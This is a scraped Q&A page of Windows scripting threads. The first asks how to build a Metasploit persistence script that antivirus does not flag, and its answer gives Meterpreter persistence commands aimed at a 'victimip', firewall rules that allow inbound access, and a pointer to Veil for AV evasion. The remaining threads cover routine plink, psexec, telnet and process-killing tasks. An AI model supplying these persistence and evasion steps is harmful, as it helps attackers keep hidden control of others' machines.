I am trying to design a simple persistence script for Metasploit, considering the one they have is tagged by antivirus. I'm running into some trouble about what the code should look like. Here's my plan:
1. Batch file in startup folder with a loop function
2. Said batch file does a tasklist command and searches for the name of the file on the running processes
3. If it finds the process running it does nothing
4. If it does not see the process running, it simply starts it again
It is very simple design but I am running into trouble when i am writing the code. My question is: How do I write this idea into a command? The idea being how the if statement factors into the tasklist command. So I need the tasklist command to be filtered to see if the process is running based on the name, and then I need to set the output of the tasklist command as a variable so that I can write the if statement:
if %process%==Client.exe (goto yes)
Metasploit ships with default auxiliary modules. In your scenario, you can work with execute
run metsvc over meterprerter. or
run persistence -U -i <interactive seconds > -p portnumber -r victimip
you can also create rule using netsh
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program= %SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
Using Powershell
New-NetFirewallRule -DisplayName “Allow Inbound Telnet” -Direction Inbound -Program %SystemRoot%\System32\tlntsvr.exe -RemoteAddress LocalSubnet -Action Allow
If any AV is detceting your backdoor, Please use veil framework
Related
I have a PS script right now that lets me log into a range of switches one after another.
70..80 | % { plink "172.16.15.$_" -l enterusername -pw enterpassword}
This allows me to start at switch ending in .70 and once I am done and type exit, it automatically logs into the next one in sequence.
I want to create a text file that contains the changes I want to make to the running-config on the switch, such as maybe adding a user to 100 or so switches. How can I add to the PS script to make it so that it applies the changes to the config contained in the created text file? I am trying to automate changes to 100 edge switches vs having to type the config into each switch.
Or instead of pointing to a text file, can I somehow add the changes for the switch config right into the PS script?
When in doubt, read the documentation (emphasis mine):
7.2 Using Plink
This section describes the basics of how to use Plink for interactive logins and for automated processes.
Once you've got a console window to type into, you can just type plink on its own to bring up a usage message. This tells you the version of Plink you're using, and gives you a brief summary of how to use Plink:
Z:\sysosd>plink
PuTTY Link: command-line connection utility
Release 0.53
Usage: plink [options] [user#]host [command]
("host" can also be a PuTTY saved session name)
Options:
-v show verbose messages
-load sessname Load settings from saved session
-ssh -telnet -rlogin -raw
force use of a particular protocol (default SSH)
-P port connect to specified port
-l user connect with specified username
-m file read remote command(s) from file
-batch disable all interactive prompts
So all you need to do is create your command file, and add it to the commandline:
70..80 | ForEach-Object {
plink "172.16.15.$_" -l enterusername -pw enterpassword -m 'C:\commands.txt'
}
When our installer getting failed, a rollback process is starting by default.
Because our installer involves Windows services, we use the Optional Rollback Script property to close and delete these services in case of a failure after their installation.
Our problem is that some processes remain assigned to some ports, a situation which leads the user to not be able to delete the installation directory without killing these ports first.
Now, in the command line, it's quite easy to locate and kill these processes with the commands:
netstat -ano | findstr :<portNumber>
taskkill /PID <processId> /F
My problem is that I'm not able to run these commands through the Run Script action, getting their processes id's and than close them. (not matter what, I cannot get the output back)
Is there any such a build-in option in the Installer? If not, is there any alternative way?
You can use the WinProcesses API to kill processes:
https://resources.ej-technologies.com/install4j/help/api/com/install4j/api/windows/WinProcesses.html
As for calling netstat, you have to call
netstat -ano
with a "Run executable or batch file" action and set its "Redirect stdout" property to "To installer variable". Then you can parse the output in a "Run script" action.
In order to verify a newly implemented firewall rule, I typically do the following manually:
Ex. Firewall rule: SRC-ip, DST-ip, DST-port, (protocol=TCP)
Login to the SRC box
Open up a cmd window on the SRC box (assuming Windows OS)
telnet (and check for connectivity)
I would like to automate this (to verify a long list of rules) using batch-scripting or PowerShell scripting.
I would like to be able to run the script on a third machine (other than SRC/DST).
I tried to use "Enter-PSSession" on PowerShell window to fire off remote telnet command but it didn't work, the telnet command just returned nothing.
Please share any ideas on how to implement this script.
Thanks,
Jatin
check this one: http://thesurlyadmin.com/2013/04/04/using-powershell-as-a-telnet-client/ which based on Lee-Holmes code:
http://www.leeholmes.com/blog/2006/08/30/replacing-telnet-exe-now-removed-from-vista/
Also you can add your commands to a text file and execute it using plink.exe(Putty Link) with the -m switch
-m file read remote command(s) from file
I want to run this command
telnet -a servername port
-CASServer V2.00 connection from 0.0.0.0 [] Diag mode only
status
Clients: Static 0/50 Dynamic 19/50
Application1: 1 0xcb4388 hSock(0x2d4)
Application2: 0 0
OK
I am basically only interested in "Dynamic 19/50". If possible, I'd like to get this information from PowerShell
The PowerShell script at http://community.spiceworks.com/scripts/show/1887-get-telnet-telnet-to-a-device-and-issue-commands might work for what your're trying to accomplish. It creates a PowerShell function called 'Get-Telnet'; it can establish a telnet connection and send a series of commands.
Your usage would be something like:
Get-Telnet -RemoteHost [servername] -Port [port] -OutputhPath results.txt
After which you could parse the data you need (e.g., the 'Clients' line) from 'results.txt'.
In order to run a cmd line application in PowerShell, specifically the telnet command, you first need to install telnet.
Use this command, with admin privs:
pkgmgr /iu:"TelnetClient"
After installing you can run your telnet -a servername port command in PowerShell:
Running a command line application (telnet) in PowerShell
I am not positive on what exact command line application you are trying to run. However here is an example of running a command line application in powershell.
&'C:\Program Files\gs\gs9.14\bin\gswin64c.exe' -sDEVICE=tiffg4 -dBATCH -dNOPAUSE -q -r600 "-sOutputFile=$OutputFullDirectory" "$InputPath"
This would be ghostscript however the key is using the & symbol to call the command line and then enter in the path to the exe file you want to run then you can pump in the parameters. Hope this helps lead you in the right direction
I'm trying to dump DHCP settings from an older server thats being decommissioned. I ran the command fine while on the actual server but when trying to run it using psexec remotely, it keeps failing. The command is: psexec \\$source netsh dhcp server \\$source dump>$dhcpSettings
$source = the server being decommissioned
$dhcpSettings = the path to save the dumped settings
I've tried all sorts of combinations of encapsulating quotation marks but still nothing. the errors I'm getting is, "The system cannot find the file specified" and "The system cannot find the path specified"
EDIT: So I got rid of the path to save the dumped settings and now it works. But how should I format the command so that it'll save the settings to the remote computer's C:\USER.SET\LOG directory?
One solution might be to bundle the command you want to run and the stdout redirection into a single line cmd file and use PsExec -c or -f to copy and execute that file on the remote system. As an example
Create a line cmd file named DHCPSettings.cmd with the following in it and save it to C:\temp\:
netsh dhcp server \\localhost dump >c:\user.set\log\dhcpsetting.log
Then use
psexec \\$source -c c:\temp\DHCPSettings.cmd
You did not really provide any code to go by and I am not sure I understand the all requirements and constraints you have, so consider this as an idea; not the exact commands you need to run. Hope it helps.